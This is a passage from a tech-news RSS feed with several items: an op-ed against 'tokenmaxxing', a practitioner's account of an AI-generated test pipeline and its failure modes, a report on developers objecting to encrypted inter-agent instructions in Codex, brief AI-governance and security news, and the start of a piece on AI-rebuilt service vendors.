<h2 class="wp-block-heading">Quantity in the age of AI</h2>



<p class="wp-block-paragraph">Today, “<a href="https://www.infoworld.com/article/4183060/the-tokenmaxxing-backlash-is-coming.html">tokenmaxxing</a>,” a trend in which developers and teams optimize for <a href="https://www.infoworld.com/article/4170173/tokenmaxxing-is-super-dumb.html" data-type="link" data-id="https://www.infoworld.com/article/4170173/tokenmaxxing-is-super-dumb.html">consuming as many AI model tokens as possible</a>, treats raw consumption as an equivalent for output. As I see it, this is the latest flawed productivity metric to make its way into the world of software engineering. Tokenmaxxing is nothing more than another vanity metric, and is just as useless as using “lines of code” or inflated “story points” as a benchmark.</p>



<p class="wp-block-paragraph">Tokenmaxxing is the result of a few different behaviors, including:</p>



<ul class="wp-block-list">
<li>Prompt flooding: stuffing massive codebases, documentation, and context into every prompt, burning tokens on context the model doesn’t actually need.</li>



<li>Agent swarms: running multiple AI agents in parallel to maximize code output, regardless of whether the work is coordinated or coherent.</li>



<li>Background loops: keeping AI sessions or agents running continuously in the background, racking up token spend without clear ownership of what is being produced — or why.</li>
</ul>



<p class="wp-block-paragraph"><br>Now, it is no secret that AI is reshaping how software is developed, and these behaviors are the result of that reshaping. Providing AI with codebases, running multiple agents at once, and even relying on coding assistants for help all have their uses. But when we lose control of the changes we are making and why we are making them, we find ourselves facing a new version of the same old problem: measuring engineering productivity with the wrong metrics.</p>



<p class="wp-block-paragraph">A more useful question to ask isn’t, “How many tokens did we spend?” but rather, “What problem did we actually solve, and for whom?”</p>



<h2 class="wp-block-heading">Spending resources without goals</h2>



<p class="wp-block-paragraph">Yes, AI is giving software engineers the ability to do more with less, to move quickly, and to experiment in ways that were previously out of reach. But leaning on AI to <em>perform</em> productivity, rather than <em>deliver</em> it, is a trap that will cost us in code quality, team capability, and business credibility.</p>



<p class="wp-block-paragraph">As a CTO, I am all for experimenting with AI. I want to use it to make our programs better, stronger, and future-proof. What I don’t want is for it to drive us toward excess while leaving us with little to show for it.</p>



<p class="wp-block-paragraph">The test I keep coming back to is simple: does this AI-generated output help us ship something that matters? Does it reduce friction for a user, close a gap in a workflow, or improve reliability for a customer? If the answer isn’t clear, then we are spending resources — both human and computational — without a defined goal. And that is not engineering. That is activity.</p>



<h2 class="wp-block-heading">Spec-driven development: where value gets defined</h2>



<p class="wp-block-paragraph">It is time to adopt newer approaches like <a href="https://www.infoworld.com/article/4166817/vibe-coding-or-spec-driven-development-how-to-choose.html" data-type="link" data-id="https://www.infoworld.com/article/4166817/vibe-coding-or-spec-driven-development-how-to-choose.html">spec-driven development</a>, a method where engineers write detailed specifications first and AI generates code against them. Rather than relying on prompt flooding and agent swarms and hoping AI produces the best result, we need to shift toward defining requirements, reviewing AI-generated output, and orchestrating systems with intent.</p>



<p class="wp-block-paragraph">But spec-driven development is <a href="https://www.augmentcode.com/guides/what-is-spec-driven-development" data-type="link" data-id="https://www.augmentcode.com/guides/what-is-spec-driven-development">more than a methodology</a>. It is the place where engineering intent and business value get defined together. The spec is where you answer, “Why does this matter, and what problem are we solving?” before a single token gets spent.</p>



<p class="wp-block-paragraph">Software engineers have long taken pride in writing elegant code, and I would hate to see AI cheapen that pride rather than elevate it. In an AI-first world, the craft shouldn’t disappear; it should simply move upstream. The spec is where elegance lives now, and it deserves the same attention to detail we once reserved for the code itself.</p>



<p class="wp-block-paragraph">At its core, software engineering is about defining, analyzing, and resolving technical challenges. If we are willingly giving all of that up to AI, we will lose the integrity of our discipline and the ability to prove our value. Using the maximum number of tokens to produce code isn’t impressive. Using a well-crafted, intentional prompt to solve a specific problem? That’s the work worth celebrating.</p>



<h2 class="wp-block-heading">Stop performing productivity and start delivering it</h2>



<p class="wp-block-paragraph">We are at an inflection point. Many organizations are defaulting to activity-based metrics, measuring how much AI is being used rather than whether it is improving delivery, product quality, or business outcomes.</p>



<p class="wp-block-paragraph">The question worth asking is not, “How much AI did we use this sprint?” It is “What value did we deliver for our users, our team, or our business?” Was it the ability to resolve a critical bug more quickly? Reduced cycle time on a high-value feature? A customer workflow that now takes minutes instead of hours? Those are outcomes. Those are the things worth measuring.</p>



<p class="wp-block-paragraph">AI can help us deliver meaningful outcomes faster, but only if we use it with the same rigor and intent we expect from every other engineering or business decision. Don’t let it become another form of productivity theater. The most successful engineering organizations in the age of AI won’t be the ones that consumed the most tokens, they’ll be the organizations that never lost sight of why they were building in the first place.</p>



<p class="wp-block-paragraph"><em>—</em></p>



<p class="wp-block-paragraph"><a href="https://www.infoworld.com/blogs/new-tech-forum"><strong><em>New Tech Forum</em></strong></a><em><strong> provides a venue for technology leaders—including vendors and other outside contributors—to explore and discuss emerging enterprise technology in unprecedented depth and breadth. The selection is subjective, based on our pick of the technologies we believe to be important and of greatest interest to InfoWorld readers. InfoWorld does not accept marketing collateral for publication and reserves the right to edit all contributed content. Send all </strong></em><em><strong>inquiries to </strong></em><a href="mailto:doug_dineley@foundryco.com"><strong><em>doug_dineley@foundryco.com</em></strong></a><em><strong>.</strong></em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[What 80% AI-written test pipelines actually cost]]></title>
<description><![CDATA[The first time I heard someone say their AI now wrote 80% of their tests, I asked the obvious question. Eighty percent of what?



After 20 years building and leading test automation for consumer-scale platforms, my honest answer turned out to be eighty percent of the typing, not eighty percent o...]]></description>
<link>https://tsecurity.de/de/3671153/ai-nachrichten/what-80-ai-written-test-pipelines-actually-cost/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3671153/ai-nachrichten/what-80-ai-written-test-pipelines-actually-cost/</guid>
<pubDate>Wed, 15 Jul 2026 17:19:22 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">The first time I heard someone say their AI now wrote 80% of their tests, I asked the obvious question. Eighty percent of what?</p>



<p class="wp-block-paragraph">After 20 years building and leading test automation for consumer-scale platforms, my honest answer turned out to be eighty percent of the <em>typing</em>, not eighty percent of the <em>engineering</em>. The remaining twenty was where the work still lived. Budgeting for two percent of leftover effort was the mistake. When the real number was closer to thirty, that gap was the difference between a pipeline that shipped and one that quietly built up a queue of half-trusted features nobody could rely on.</p>



<p class="wp-block-paragraph">This piece is about that gap. As an independent research project on LLM-augmented testing methodology, I built a six-stage agentic pipeline that takes a design in Figma and produces running tests in WebDriverIO, connected end to end over the <a href="https://modelcontextprotocol.io/">Model Context Protocol</a>. It works. It has been useful. And the parts that broke surprised me, because they were not the parts the hype cycle tells you to worry about.</p>



<h2 class="wp-block-heading">How I wired a six-stage pipeline over one protocol</h2>



<p class="wp-block-paragraph">The pipeline runs six stages in sequence, each owned by a different agent, with every handoff crossing MCP.</p>



<p class="wp-block-paragraph">Six-stage agentic test pipeline: design capture → requirements writer → ticket opener → code generator → test-case writer → automation generator. Each stage carries an MCP handoff and a provenance stamp.</p>



<p class="wp-block-paragraph">The end-to-end trace links a pull request back to a Jira ticket, a requirements section and a Figma frame. Each artifact is stamped with the agent that produced it, the model it used and the inputs it was given.</p>



<p class="wp-block-paragraph">MCP is the boring middle that makes any of this work. The cliché is that MCP is “USB-C for AI”: one open protocol, any tool. Like most analogies, it is about eighty percent right. The part that matters is the eighty: I do not have to write a custom adapter for every system the agent talks to. One MCP server per tool and every agent talks to all of them the same way.</p>



<p class="wp-block-paragraph"><strong>Typed handoffs between agents are my own architecture, layered on top of MCP rather than provided by it.</strong> Each agent writes a typed artifact the next agent reads. Each handoff is logged with provenance. When something went wrong six stages in, I could replay the chain. Without that discipline, a multi-agent pipeline is a debugger’s worst day. You know the test plan is wrong. You cannot tell whether the mistake came from the Figma read, the requirements interpretation or the ticket scaffolding. With it, I could point at exactly which stage went sideways and which inputs it was looking at when it did. The pattern lives in a <a href="https://github.com/SuneetMalhotra/agent-harness">public MIT-licensed reference implementation</a> for any reader who wants to run it.</p>



<p class="wp-block-paragraph"><strong>The sixteen-minute number is the marketing number.</strong> I ran the full chain end to end in about sixteen minutes on a synthetic net-new screen, Figma in, automation suite out. That repeated across my runs; it is not a demo trick. But sixteen minutes is the part of the story most fun to tell and least useful to learn from. It is what gets quoted in the all-hands. The hours that come after, when a human reviews each handoff, are where the work actually lives.</p>



<h2 class="wp-block-heading">What actually broke in production-style runs</h2>



<p class="wp-block-paragraph">The failures that stalled my pipeline were rarely the ones I expected.</p>



<p class="wp-block-paragraph">I expected hallucinated APIs. I got them: the agent confidently called endpoint names that sounded right but did not exist. I expected sparse-spec-in, sparse-spec-out, where a Figma frame with no annotations produced a requirements doc with vague acceptance criteria, every time. I expected locator drift, the common UI-automation failure mode where a renamed component silently breaks an entire test suite. There is solid <a href="https://martinfowler.com/articles/nonDeterminism.html">outside writing on non-determinism in tests</a> covering this whole family of failure modes, and the agent inherited every one.</p>



<p class="wp-block-paragraph">What I did not expect, and what kept the pipeline down longer than any of the above, was the plumbing.</p>



<p class="wp-block-paragraph">The model backend timed out under load. It lost credentials silently and started returning empty strings, which the agent then read as confidence. A duplicate consumer on a shared long-poll API endpoint produced an HTTP 409 conflict that broke delivery without throwing anything visible. One unguarded exception inside one agent aborted a whole shared scheduler run and took the other agents in the registry down with it. The single worst incident cost me three hours to find. An environment variable had silently rotated overnight; every agent in the fleet was returning structurally valid but semantically empty requirements docs; the downstream stages were dutifully generating tests against nothing.</p>



<p class="wp-block-paragraph">None of those are model bugs. They are infrastructure. The agent literature, which is what I went looking through when I started this work, mostly does not talk about them.</p>



<p class="wp-block-paragraph">The fix was not better prompts. It was <a href="https://martinfowler.com/bliki/CircuitBreaker.html">circuit-breaker-style</a> review checkpoints between stages and what I now call <strong>the four-guard discipline</strong>: four small guards I consider non-negotiable on any unattended agentic pipeline. The bulkhead pattern from microservices is the most consequential. An unhandled exception inside one agent can no longer abort the shared run; the offending agent fails fast with a structured error and the others keep going. Paired with that, a pure-data fallback ensures a model timeout produces a deterministic output explicitly marked as degraded mode, rather than an empty string the next stage will misread as confidence. A single-owner lease sits on every shared external endpoint, the cure for the duplicate-consumer incident that ate one of my Sunday afternoons. The cheapest guard was the last to arrive: a one-line synthetic canary every agent has to produce a known correct response to before any real work begins, so a credentials rotation or silent backend failure trips an alert before downstream stages have generated artifacts against garbage.</p>



<p class="wp-block-paragraph">None of these guards is novel. They are textbook stability patterns at a new boundary: the seam between the LLM agent and the rest of the system, which most of the existing agent literature still treats as a solved problem.</p>



<h2 class="wp-block-heading">The 20% you don’t see, and when not to do this</h2>



<p class="wp-block-paragraph">Here is the part the demo videos leave out. Even when the pipeline works, the human time per stage does not go to zero.</p>



<p class="wp-block-paragraph">Human review time per ticket across five pipeline stages: code review 60-180 min, automation review and flaky-fix loop 30-90 min, ticket architecture and sequencing 30-60 min, test data and environment 15-30 min, requirements review 20-30 min. Net: the human still spends 20-30% of the original effort, almost all of it reviewing rather than creating.</p>



<p class="wp-block-paragraph"><strong>Net of all that, the human still spends twenty to thirty percent of the original effort, almost all of it reviewing rather than creating.</strong> The pipeline saves seventy to eighty percent, not ninety-eight. The trap is budgeting for the two percent you do not save.</p>



<p class="wp-block-paragraph">When does this kind of pipeline make sense? In my experience, when the Figma is richly annotated and acceptance criteria are clear up front; when there is review capacity to absorb the work the pipeline shifts onto humans; when the stack is well represented in the training data; and when the feature is net-new rather than a deep edit of legacy code. When does it not? When the design lives on a whiteboard. When the integration touches old code with hidden contracts. When the path is regulated or safety-critical. When there is no senior reviewer who can hold the line. When the work is exploratory and writing the spec is the actual point of the exercise.</p>



<p class="wp-block-paragraph">Teams I have seen succeed with agentic pipelines budget for the rework explicitly, staff the review queue and treat the saved hours as capacity for harder problems rather than headcount they can release. Teams I have seen struggle did the opposite: declared victory at the demo and quietly accumulated a backlog of half-trusted features the next quarter had to clean up.</p>



<p class="wp-block-paragraph">The right unit of measurement is not how much the pipeline generates. It is how much of what it generates a human still has to touch before you would ship it. Call it <strong>the 80/20 rework rule</strong>: measure the rework, not the generation. The teams that get the rework number right are the ones whose AI investments compound. The teams that stop counting at the headline percentage are the ones that own the cleanup six months later.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.infoworld.com/expert-contributor-network/"><strong><u>Want to join?</u></strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Codex Multi-Agent V2 update raises developer concerns over agent transparency]]></title>
<description><![CDATA[OpenAI’s recent update to its Codex CLI has introduced a new protocol that appears to shift more orchestration decisions from user-defined configuration to the runtime, prompting developers to request greater visibility into the instructions exchanged between AI agents.



In a detailed GitHub me...]]></description>
<link>https://tsecurity.de/de/3671150/ai-nachrichten/codex-multi-agent-v2-update-raises-developer-concerns-over-agent-transparency/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3671150/ai-nachrichten/codex-multi-agent-v2-update-raises-developer-concerns-over-agent-transparency/</guid>
<pubDate>Wed, 15 Jul 2026 17:19:18 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">OpenAI’s recent update to its Codex CLI has introduced a new protocol that appears to shift more orchestration decisions from user-defined configuration to the runtime, prompting developers to request greater visibility into the instructions exchanged between AI agents.</p>



<p class="wp-block-paragraph">In a detailed GitHub <a href="https://github.com/openai/codex/pull/26210" target="_blank" rel="noreferrer noopener">merged request</a>, users stated that the Multi-Agent V2 protocol-infused architecture of the CLI no longer exposes the instructions passed between parent and sub-agents, making it difficult to inspect how work is delegated across the system.</p>



<p class="wp-block-paragraph">“Multi-agent v2 currently routes agent instructions through normal tool arguments and inter-agent context. That means the parent model can emit plaintext task text, Codex can persist it in history/rollouts, and the recipient can receive it as ordinary assistant-message <a href="https://www.infoworld.com/article/2255837/what-is-json-a-better-format-for-data-exchange.html">JSON</a>,” the request read.</p>



<p class="wp-block-paragraph">“This changes the v2 path so agent instructions stay encrypted between model calls: Responses encrypts the message argument returned by the model, Codex forwards only that ciphertext, and Responses decrypts it internally for the recipient model,” it added.</p>



<p class="wp-block-paragraph">Other users, commenting on the thread, also said that the lack of visibility into agent instructions can be attributed to the recently introduced Multi-Agent V2 protocol, with one user stating that reverting to the previous version of the CLI restored visibility, but only as a temporary workaround.</p>



<p class="wp-block-paragraph">Separately, <a href="https://www.linkedin.com/in/ignatremizov/" target="_blank" rel="noreferrer noopener">Ignat Remizov</a>, CTO at payment service Zolvat, <a href="https://github.com/ignatremizov" target="_blank" rel="noreferrer noopener">filed</a> a GitHub <a href="https://github.com/openai/codex/issues/28058" target="_blank" rel="noreferrer noopener">feature request</a> to offer what can be described as a permanent fix after stating that OpenAI may have introduced the change in efforts to harden security.</p>



<p class="wp-block-paragraph">“A possible shape is to keep the encrypted message field for model delivery, but add a separate non-encrypted audit field for the readable task text. The audit field should be persisted in rollout/history/trace metadata so users and maintainers can inspect what was delegated without needing to decrypt model-delivery ciphertext,” Zolvat wrote.</p>



<h2 class="wp-block-heading">Enterprise governance concerns are likely to emerge</h2>



<p class="wp-block-paragraph">While an <a href="https://github.com/openai/codex/issues/26753#issuecomment-4637873271" target="_blank" rel="noreferrer noopener">OpenAI contributor said</a> the protocol remains under development and declined further changes to the request, analysts warned that the issue would create debugging, governance, and operational challenges for development teams and their enterprises if the issue persists or becomes a long-term characteristic of multi-agent systems.</p>



<p class="wp-block-paragraph">“Hidden agent instructions reduce observability in multi-agent systems. Developers can no longer see whether failures stemmed from incorrect task delegation, poor orchestration, or model reasoning, making debugging, prompt optimization, and root-cause analysis significantly harder. Agent instruction traces are becoming as essential as application logs in modern software,” said <a href="https://pareekh.com/about/" target="_blank" rel="noreferrer noopener">Pareekh Jain</a>, principal analyst at Pareekh Consulting.</p>



<p class="wp-block-paragraph">For CIOs, Jain pointed out, opaque agent interactions create governance challenges.</p>



<p class="wp-block-paragraph">“Without visibility into how agents delegated and executed tasks, it becomes harder to audit decisions, investigate incidents, demonstrate compliance, and build trust in AI systems. Enterprises will increasingly expect secure but auditable agent communication rather than completely hidden orchestration,” Jain said.</p>



<p class="wp-block-paragraph">“Any big enterprise, especially in regulated industries such as banks and hospitals, needs to be able to prove what their AI systems did and why, especially if something goes wrong. If a sub-agent does something bad, like touching private data, the company needs to show here’s exactly what it was told to do. If that record doesn’t exist, it is a serious problem for trust and legal accountability, not just an annoyance,” Jain added.</p>



<p class="wp-block-paragraph">Further, the analyst pointed out that issues around the visibility of agent operations could even slow production deployments of mission-critical AI.</p>



<p class="wp-block-paragraph">“Enterprises, just like we are seeing with developers on GitHub, are likely to demand stronger observability, audit trails, and governance before trusting autonomous multi-agent systems. It is nearly as important as model performance,” Jain added.</p>



<p class="wp-block-paragraph">An email sent to OpenAI enquiring about planned changes to the protocol went unanswered.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Google DeepMind CEO Calls for Frontier AI Standards Body]]></title>
<description><![CDATA[Google DeepMind CEO Demis Hassabis is calling for a new standards body to oversee frontier AI as experts debate whether existing testing institutions should be strengthened instead. The post Google DeepMind CEO Calls for Frontier AI Standards Body appeared first on TechNewsWorld.]]></description>
<link>https://tsecurity.de/de/3670545/it-nachrichten/google-deepmind-ceo-calls-for-frontier-ai-standards-body/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3670545/it-nachrichten/google-deepmind-ceo-calls-for-frontier-ai-standards-body/</guid>
<pubDate>Wed, 15 Jul 2026 14:02:30 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div><img width="300" height="156" src="https://www.technewsworld.com/wp-content/uploads/sites/3/2026/07/ai-governance-standards-safety-300x156.jpg" class="attachment-medium size-medium wp-post-image" alt="AI governance surrounded by accountability, transparency, privacy, data governance, and AI safety" decoding="async" loading="lazy" srcset="https://www.technewsworld.com/wp-content/uploads/sites/3/2026/07/ai-governance-standards-safety-300x156.jpg 300w, https://www.technewsworld.com/wp-content/uploads/sites/3/2026/07/ai-governance-standards-safety-768x399.jpg 768w, https://www.technewsworld.com/wp-content/uploads/sites/3/2026/07/ai-governance-standards-safety.jpg 1000w" sizes="auto, (max-width: 300px) 100vw, 300px"></div>Google DeepMind CEO Demis Hassabis is calling for a new standards body to oversee frontier AI as experts debate whether existing testing institutions should be strengthened instead. The post <a rel="nofollow" href="https://www.technewsworld.com/story/google-deepmind-ceo-calls-for-frontier-ai-standards-body-180439.html?rss=1">Google DeepMind CEO Calls for Frontier AI Standards Body</a> appeared first on <a rel="nofollow" href="https://www.technewsworld.com/?rss=1">TechNewsWorld</a>.]]></content:encoded>
</item>
<item>
<title><![CDATA[Nigeria Deepens Cybersecurity Efforts as Cybercriminals See More Profits]]></title>
<description><![CDATA[The West African country advanced rules to force organizations to disclose cyberattacks, joining other nations in a shift to mandated transparency.]]></description>
<link>https://tsecurity.de/de/3669962/it-security-nachrichten/nigeria-deepens-cybersecurity-efforts-as-cybercriminals-see-more-profits/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3669962/it-security-nachrichten/nigeria-deepens-cybersecurity-efforts-as-cybercriminals-see-more-profits/</guid>
<pubDate>Wed, 15 Jul 2026 10:10:52 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The West African country advanced rules to force organizations to disclose cyberattacks, joining other nations in a shift to mandated transparency.]]></content:encoded>
</item>
<item>
<title><![CDATA[Frontier AI: The Genie's Out of the Bottle, But Where's the Rulebook?]]></title>
<description><![CDATA[Cutting-edge artificial intelligence models are deploying with more independence and less human oversight. Several state governments are trying to legislate transparency in their use.]]></description>
<link>https://tsecurity.de/de/3668575/it-security-nachrichten/frontier-ai-the-genies-out-of-the-bottle-but-wheres-the-rulebook/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3668575/it-security-nachrichten/frontier-ai-the-genies-out-of-the-bottle-but-wheres-the-rulebook/</guid>
<pubDate>Tue, 14 Jul 2026 18:14:09 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Cutting-edge artificial intelligence models are deploying with more independence and less human oversight. Several state governments are trying to legislate transparency in their use.]]></content:encoded>
</item>
<item>
<title><![CDATA[StubHub, CEO Hit With 'Deceptive Practices' Class Action Over Mass Scalping]]></title>
<description><![CDATA[An anonymous reader quotes a report from the BBC: StubHub and its CEO, Eric Baker, have been hit with a proposed $5-million class-action lawsuit in the United States over the company's ties to large-scale scalpers -- connections reported by CBC News last week. The suit, filed Monday by New York t...]]></description>
<link>https://tsecurity.de/de/3668427/it-security-nachrichten/stubhub-ceo-hit-with-deceptive-practices-class-action-over-mass-scalping/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3668427/it-security-nachrichten/stubhub-ceo-hit-with-deceptive-practices-class-action-over-mass-scalping/</guid>
<pubDate>Tue, 14 Jul 2026 17:07:43 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[An anonymous reader quotes a report from the BBC: StubHub and its CEO, Eric Baker, have been hit with a proposed $5-million class-action lawsuit in the United States over the company's ties to large-scale scalpers -- connections reported by CBC News last week. The suit, filed Monday by New York ticket buyer Louis Sanquini, alleges deceptive practices and fraudulent misrepresentation over StubHub's promoting itself as a "marketplace for fans to buy and sell tickets." The online ticket resale giant has faced a storm of customer complaints after cancelling thousands of World Cup tickets. The company has repeatedly said it is simply a technology platform that does not buy, sell or possess tickets. However, CBC reported last week that Baker disclosed in recent filings with the U.S. Securities and Exchange Commission that he runs Andro Capital, a hedge fund that engages in large-scale resale of millions of dollars' worth of sports and concert tickets on the StubHub resale platform.
 
Sanquini filed the proposed class action in the Southern District of New York, arguing consumers were kept in the dark and that he believed StubHub was a "neutral" marketplace. Lead counsel Kevin Steinberg told CBC News in an emailed statement that "consumers deserve honesty and transparency." A CBC investigation found that the CEO of online ticket reseller StubHub owns and manages a hedge fund that scalps millions of dollars of its own tickets. "While what StubHub is alleged to have engaged in and perpetrated upon millions of patrons is unfathomable, this case is about transparency and consumer trust. If companies make representations to the public, consumers are entitled to expect that those representations are complete and accurate," he said.
 
The claim reads: "Defendants' failure to disclose this conflict of interest, while affirmatively marketing StubHub as a fan-to-fan marketplace, deceived Plaintiff and the Class and caused them to pay prices, and accept terms, they would not have accepted had the truth been known." Sanquini argues that had he known StubHub's CEO held a financial interest and that the company was helping finance professional resellers, he would never have used the resale site to buy tickets to see rock band Kiss in 2023 or to attend a New York Red Bulls-New York City FC Major League Soccer match in 2024.<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=StubHub%2C+CEO+Hit+With+'Deceptive+Practices'+Class+Action+Over+Mass+Scalping%3A+https%3A%2F%2Fyro.slashdot.org%2Fstory%2F26%2F07%2F14%2F0735222%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fyro.slashdot.org%2Fstory%2F26%2F07%2F14%2F0735222%2Fstubhub-ceo-hit-with-deceptive-practices-class-action-over-mass-scalping%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://yro.slashdot.org/story/26/07/14/0735222/stubhub-ceo-hit-with-deceptive-practices-class-action-over-mass-scalping?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Your service vendors are being rebuilt around AI]]></title>
<description><![CDATA[Venture-backed firms are buying up the support, finance-ops and managed-services providers enterprises rely on and re-platforming them around AI agents — and the renewal that follows arrives priced per outcome, sold as your advantage. The acquisition-built structure and unproven stability create ...]]></description>
<link>https://tsecurity.de/de/3667858/it-nachrichten/your-service-vendors-are-being-rebuilt-around-ai/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3667858/it-nachrichten/your-service-vendors-are-being-rebuilt-around-ai/</guid>
<pubDate>Tue, 14 Jul 2026 14:02:49 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Venture-backed firms are buying up the support, finance-ops and managed-services providers enterprises rely on and re-platforming them around AI agents — and the renewal that follows arrives priced per outcome, sold as your advantage. The acquisition-built structure and unproven stability create governance and continuity risks your vendor process isn’t sized for. Here’s how to keep the leverage on your side of the table.</p>



<p class="wp-block-paragraph">The first time an AI-native services pitch crossed my desk, I nearly signed it. The savings were real, the agents demoed cleanly and the pricing was the kind procurement loves — per resolved case, not per seat. What I almost missed was who got to define the word “resolved.” On an earlier outsourced-support arrangement, back in my public-sector days, the vendor’s reported resolution rate looked excellent right up until we pulled the reopen numbers ourselves. Auto-closed tickets had been counted as wins. Users had quietly stopped logging issues at all. The dashboard was green; the service was not.</p>



<p class="wp-block-paragraph">That gap — between the number on the contract and what your users actually live with — is the whole game now, and it is about to scale across your portfolio. <a href="https://www.gartner.com/en/articles/hype-cycle-for-agentic-ai">Gartner’s 2026 CIO and Technology Executive Survey found only 17% of organizations have deployed AI agents, but more than 60% expect to within two years</a> — the steepest adoption curve of any emerging technology it tracks. The providers running your services are moving first, and the contracts are changing faster than most of us can govern them.</p>



<p class="wp-block-paragraph">The agents underneath these pitches are also nowhere near as reliable in production as they look in the room. <a href="https://www.gartner.com/en/newsroom/press-releases/2025-06-25-gartner-predicts-over-40-percent-of-agentic-ai-projects-will-be-canceled-by-end-of-2027">Gartner expects more than 40% of agentic AI projects to be canceled by the end of 2027</a> on cost, unclear value and weak risk controls, and reckons only about 130 of the thousands of self-described agentic vendors are the real thing — the rest are “agent washing” old chatbots and RPA. Treat any headline resolution rate the way you treat a vendor’s own uptime stats: Marketing, until you have seen it run on accounts like yours.</p>



<h2 class="wp-block-heading">What’s behind the pitch</h2>



<p class="wp-block-paragraph">The challenger’s economics aren’t magic. They come from a reshaping of the services market: Venture-backed firms buying up fragmented, labor-heavy providers — support desks, contact centers, AP and finance ops, slices of managed IT — and re-platforming them around agents. Many of the companies pitching you are not one company at all but several acquired shops stitched onto a shared AI layer. That barely comes up in the sales meeting. It matters enormously once you are the customer.</p>



<p class="wp-block-paragraph">The direction is independently corroborated, not vendor hype. <a href="https://www.everestgrp.com/blogs/outcome-based-metrics-the-new-value-currency-in-bpo/">Everest Group reports outcome-based pricing in business-process services moving from pilots to scaled adoption</a> as AI makes outcomes measurable enough to contract on, with the binding constraint now governance and verified baselines. <a href="https://www.ey.com/content/dam/ey-unified-site/ey-com/en-gl/about-us/analyst-relations/documents/ey-gl-hfs-horizons-agentic-services-2026-ey-excerpt-04-2026.pdf">HFS Research tracks the same “services-to-software” shift</a> across consulting, IT, and operations providers. Here is the part worth holding onto: Most enterprises are early, so you have a little time. But the first vendors to reprice you this way will be the small, single-source ones in the long tail of your portfolio — which, if your stack looks anything like mine, is most of it.</p>



<h2 class="wp-block-heading">Don’t assume the incumbent is the safe choice</h2>



<p class="wp-block-paragraph">And don’t kid yourself that renewing with the familiar name keeps you clear of this. The big integrators are pulling labor out of their own delivery just as fast — <a href="https://news.outsourceaccelerator.com/it-services-firms-add-thousands/">Accenture cut tens of thousands of roles and rehired against an AI-skills filter</a> — and rewriting deals around a share of savings instead of time and materials. Outcome pricing is becoming the default everywhere. There is no version of this where you sit it out.</p>



<h2 class="wp-block-heading">Two risks your vendor process won’t catch</h2>



<p class="wp-block-paragraph">The first is governance, and the roll-up structure makes it worse than the usual AI-vendor worry. The company you are contracting with isn’t one system. It is several acquired firms with different data practices and security postures, with an AI layer dropped on top at speed. Your customer records, invoices and support transcripts flow into agents whose decisions you often can’t trace, across entities that were never built to one standard. The numbers here aren’t comforting: <a href="https://www.ibm.com/reports/data-breach">IBM’s 2025 Cost of a Data Breach Report found 63% of breached organizations had no AI governance policy at all, and 97% of those that suffered an AI-related breach lacked basic AI access controls</a> — AI adoption, IBM concluded, is outpacing both security and governance. When an agent botches a dispute or misroutes regulated data, the regulator and the customer come looking for you, not the platform. And here is the organizational trap: The savings line is what your CFO signs; the provenance question is the one your audit committee won’t ask until after the incident. Nobody raises it for you.</p>



<p class="wp-block-paragraph">The second is whether the provider will still be standing in three years. These platforms are new, built by acquisition, venture-funded and not one has run through a full contract term or a real downturn. With <a href="https://www.gartner.com/en/newsroom/press-releases/2025-06-25-gartner-predicts-over-40-percent-of-agentic-ai-projects-will-be-canceled-by-end-of-2027">Gartner expecting more than 40% of agentic AI projects to be canceled by 2027</a>, putting core operations on a young, agent-dependent vendor is a single point of failure dressed up as innovation. Write the exit and data-portability terms before you sign — while you still have leverage to.</p>



<h2 class="wp-block-heading">Six questions for the renewal</h2>



<p class="wp-block-paragraph">When the challenger shows up — or your incumbent reprices to match — these are the questions I would put on the table. They come down to one thing: Making sure you, not the vendor, own the number.</p>



<ol start="1" class="wp-block-list">
